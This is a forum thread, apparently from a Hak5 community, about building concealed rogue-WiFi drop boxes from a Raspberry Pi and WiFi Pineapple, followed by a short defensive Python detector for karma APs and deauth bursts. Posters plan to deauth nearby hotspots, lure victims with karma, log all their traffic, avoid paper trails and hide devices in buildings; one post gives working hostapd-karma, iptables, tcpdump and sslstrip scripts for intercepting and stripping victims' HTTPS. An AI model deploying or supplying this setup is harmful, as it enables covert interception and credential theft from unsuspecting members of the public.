Wifi Pineapple/f-bomb


Sleven

Anyone building this yet, Wifi Pineapple/F-Bomb or maybe raspberry pi? Concept of taking a fairly cheap AP51 and interfacing it with a fairly cheap modified pogoplug. I need something I can drop and pick up later for analysis (SSLStrip, driftnet etc...) I would be willing to fund some of this project if Hak5 would like to take this on.

http://www.geek.com/articles/chips/f-bomb-50-computer-is-designed-to-hack-secure-networks-20120131/


I've said it a million times already, but a raspberry pineapple is a recipe for win. I'm all over this shit man.

The mark4, from what I understand, is a big step towards an all-in-one wifi pwnage box, but I have yet to determine (despite questioning darren and rest on these forums) if it has the horsepower to handle all the necessary tasks itself. Or will it still need a host computer (insert raspberry pi)?

So to copy/paste from the other 10 threads I've mentioned this in...my dream dropbox will:

Upon bootup connect to closest open wifi hotspot, if no open hotspots exist, connect to Sprint's wimax network with 3g as backup (wimax for its no cap on data and speediness). It will then smtp me a message telling me its IP and that it's connected and about to wtfpwn everything around it. Then it will rename its karma'd essid to either what I set it for before dropping it (targeted) or to the closest open wifi hotspot's name (coffeshop_wifi att_wifi etc), or default to "Free Wifi". It will start a tcpdump cap of everything on eth0 to external usb stick for later retrieval at pickup time or dial in via vpn/scp. It will then start karma. Then it will airdrop nuke every AP around it for 30 seconds or so and restart another airdrop-ng for 30 seconds every 5 minutes.

So it's preventing anyone from getting on a legit wifi hotspot, it's bringing all the boys to the yard with karma, and it's logging every packet that anyone connected sends. It's also announcing itself to me with its IP so I can dial in and make any changes I might want to or grab the capture file over the air.

The more I think about it, perhaps the wimax should be the default provider of ICS to the pineapple, that way no one can deauth me, the attacker. Or sniff the traffic for that matter.

I anticipate doing this with a rasp pi with powered usb hub, an alfa 036H card, fat 32gb usb stick, and a sprint 4g usb dongle. Along with a pineapple of course. I'm still trying to source good omni antennas for this project, along with a big fat battery. I'm also working on ideas for incognito cases...something that wouldn't look out of place - any ideas?

So yeah, I've put some thought and effort into this (already begun scripting it) but would surely appreciate collaboration from any and all on these forums. The F-BOMB ain't got shit on the pineapple baby! And DARPA ain't got shit on hak5!

telot

I thought about a 3G dongle a few days back. I was testing out tethering my Android's connection with the pineapple for foot/vehicle pentest. The price of all the hardware being snatched would suck. Not to mention ensure you use a prepaid 3G for a harder paper trail. As far as omni directional antenna I would build an antenna similar to the link below. Just have to cut it to wavelength using a vswr formula. Been a bit since I have had to deal directly with the RF world. I am used to tactical radios that deal with different freqs. As far as enclosures, I stopped by Home Depot and took a look at some electrical termination boxes. I have also considered plaster casting a hollow rock. Have a few more ideas but hopefully this gets your wheels turning.

http://www.hobbyking.com/hobbyking/store/uh_viewItem.asp?idProduct=10896


  • 1 year later...

win on this. I began scripting this project a few weeks ago, as far as a case goes, right now I've just got the raspi sitting on top of the pelican case with the pineapple, anker usb hub, cruzer & stripped 4g modem all stuffed inside (tight as hell i might add).


I've already loaded karma onto the pineapple, using an AWUS036NHA as the primary karma radio and it works like a charm. You don't get the fancy UI interface, or the infusions, but I don't use those much anyways. I still prefer to use the purpose-built pineapple for pineappling, but building my own out of a raspberry pi was a fun exercise. I had never played with dnsmasq and hostapd, so it was a great learning experience that I would highly recommend for anyone, but nothing can beat the pineapple at doing what it does best :)

telot


If you can get 2 pineapples that actually stay working you can build a very nice neinsager piggy-back, and use second pineapple as a foundation for launching deauth, and logging, leaving resources on pineapple 1 fairly low...

I am BIG on enclosures right now:

Trash can with false bottom.

Power meters

An old boot <~great for alleys and large city applications

Books

Other non-intrusive electronics - shell only

I have lived in some very big cities, and I can tell ya that drug dealers in, like, Oakland, for example, keep stuff in old burgerking coffee cups or mcdonalds paper bags. They tell you what to grab from the gutter.

NO ONE picks up trash...

..so fairly safe.

My favorite?

Drop ceilings, drop ceilings, drop ceilings. Even secure buildings have restrooms, which almost always have a drop ceiling. My battery lasts 26 hrs plus...

And how you give Internet to the pineapple? When you leave it or you leave it with usb hub? It will be interesting to see your config.


Telot, did you get dhcp server running on the raspberry pi?

Yes

And how you give Internet to the pineapple? When you leave it or you leave it with usb hub? It will be interesting to see your config.

Easily with a 3G dongle or (what I prefer) a 3G cellular router.

@ telot, did you follow a tutorial for the Pi ? or are all the packages available ?

If I recall, I just followed digininja's instructions on his site. They're not pi-specific, so I had to do some tweaking...I can fire it up and report back the exact config if you want.

telot


Hey Zete: Here's the script I used to download the karma-patched hostapd.

#!/bin/sh
# bootup Module setup script
#leave this echo
echo "## Apt-getting ##"
apt-get install libnl-dev -y
#leave this echo
echo "## Compiling ##"
# Build only if hostapd is not already installed
if ! which /usr/local/bin/hostapd > /dev/null; then
    echo "### Installing hostapd-karma ###"
    # Expects hostapd-1.0-karma.tar.bz2 to already be in /tmp
    cd /tmp
    tar -jvxf hostapd-1.0-karma.tar.bz2
    cd hostapd-1.0-karma/hostapd
    make && make install
    cd ~
    hostapd -vv
    echo "### Installed hostapd-karma ###"
fi
#leave this echo
echo "## Final Commands ##"
# Enjoy - Leave me at Bottom - EOF

Go into /etc/dnsmasq.conf and make sure interface=wlan0 and then uncomment/add this line:

dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h

And you may need to change some things around in the patched karma hostapd.conf file as well. I had to change my drivers to match my card, and changed the ssid to be broadcasted.

interface=wlan0
driver=nl80211
ssid=FreeInternet
channel=1

Then I made up a quick n dirty telotscript to start it all up:

#!/bin/sh
# Enable IP forwarding and NAT for connected clients
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -j MASQUERADE
cd /root/hostapd-1.0-karma/hostapd/
./hostapd -B /root/hostapd-1.0-karma/hostapd/hostapd.conf
# Capture client subnet traffic to a pcap file
tcpdump -i wlan0 -w /root/cap.pcap -n net 192.168.0.0/24 &
# Redirect web traffic to the sslstrip listener on port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
sslstrip -w /root/sslstrip.log &

There's nothing fancy about this install, there's no gui, there's no dancing fruit, but it does work and works well. Please keep in mind I did this several months ago and may have missed something. So if the instructions are really bad (and they very well could be haha) let me know and I can do a proper write up. But I think this should get you going in the right direction.
telot
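
Seen from the monitoring side, the two behaviours this thread relies on leave distinctive traces: a karma-patched AP answers probes for many unrelated SSIDs from a single BSSID, and deauth bursts show up as a spike of deauthentication frames claiming one source. The sketch below is an added example, not part of any post in this thread; the frame tuples, MAC addresses, thresholds and function names are constructed assumptions standing in for rows exported from a monitor-mode capture.

```python
from collections import defaultdict

# Constructed sample rows: (seconds, frame_type, claimed source BSSID, SSID).
# All values are made up for illustration.
FRAMES = [
    (0.0, "probe_resp", "02:00:00:aa:aa:01", "CorpWiFi"),
    (0.4, "probe_resp", "02:00:00:bb:bb:02", "HomeNet-5731"),
    (0.5, "probe_resp", "02:00:00:bb:bb:02", "attwifi"),
    (0.9, "probe_resp", "02:00:00:bb:bb:02", "Airport_Free"),
    (1.2, "probe_resp", "02:00:00:aa:aa:01", "CorpWiFi"),
    (2.0, "deauth", "02:00:00:aa:aa:01", None),
] + [(10.0 + i * 0.1, "deauth", "02:00:00:aa:aa:01", None) for i in range(60)]


def karma_suspects(frames, min_ssids=3):
    """Map each BSSID that answered probes for >= min_ssids SSIDs to them."""
    seen = defaultdict(set)
    for _, ftype, bssid, ssid in frames:
        if ftype == "probe_resp" and ssid:
            seen[bssid].add(ssid)
    return {b: sorted(s) for b, s in seen.items() if len(s) >= min_ssids}


def deauth_bursts(frames, window=5.0, threshold=50):
    """Return (bssid, window_start, count) for the first sliding window in
    which a BSSID is the claimed source of >= threshold deauth frames."""
    times = defaultdict(list)
    for ts, ftype, bssid, _ in frames:
        if ftype == "deauth":
            times[bssid].append(ts)
    bursts = []
    for bssid, ts_list in times.items():
        ts_list.sort()
        lo = 0
        for hi, t in enumerate(ts_list):
            while t - ts_list[lo] > window:  # shrink window from the left
                lo += 1
            if hi - lo + 1 >= threshold:
                bursts.append((bssid, ts_list[lo], hi - lo + 1))
                break
    return bursts


if __name__ == "__main__":
    print("karma-like responders:", karma_suspects(FRAMES))
    print("deauth bursts:", deauth_bursts(FRAMES))
```

Deauth frames in such a burst usually carry the legitimate AP's address as a spoofed source, so a hit identifies the AP being disrupted rather than the transmitter.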